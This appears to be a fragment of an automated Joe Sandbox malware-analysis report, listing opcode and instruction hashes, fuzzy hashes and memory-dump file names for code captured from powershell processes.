                                                                                                                                                                                • Opcode ID: 6c6fed454cdbe337187363c48d38dbb2c166a6e47858a4f137e21c8646f999a1
                                                                                                                                                                                • Instruction ID: 097248fa0c5bf6dad97b6f7c563a2786d0df85eb9eb79bfd1725bd1436ef3c79
                                                                                                                                                                                • Opcode Fuzzy Hash: 6c6fed454cdbe337187363c48d38dbb2c166a6e47858a4f137e21c8646f999a1
                                                                                                                                                                                • Instruction Fuzzy Hash: 0FD11531E1EA8A5FE799EB6858655B5BBE0FF16350F0802FAD00DC71D3DB28A805C355
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000013.00000002.2590872449.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_19_2_7ff848e80000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                • Instruction ID: a525311bf5e0898e04d495dce5ac7619facc0d09e4621ee5b042099af78d6db2
                                                                                                                                                                                • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                • Instruction Fuzzy Hash: E701677111CB0D4FDB44EF0CE451AAAB7E0FB95364F50056DE58AC3651DB36E882CB45
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2848365817.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff848e80000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                • Instruction ID: a525311bf5e0898e04d495dce5ac7619facc0d09e4621ee5b042099af78d6db2
                                                                                                                                                                                • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                • Instruction Fuzzy Hash: E701677111CB0D4FDB44EF0CE451AAAB7E0FB95364F50056DE58AC3651DB36E882CB45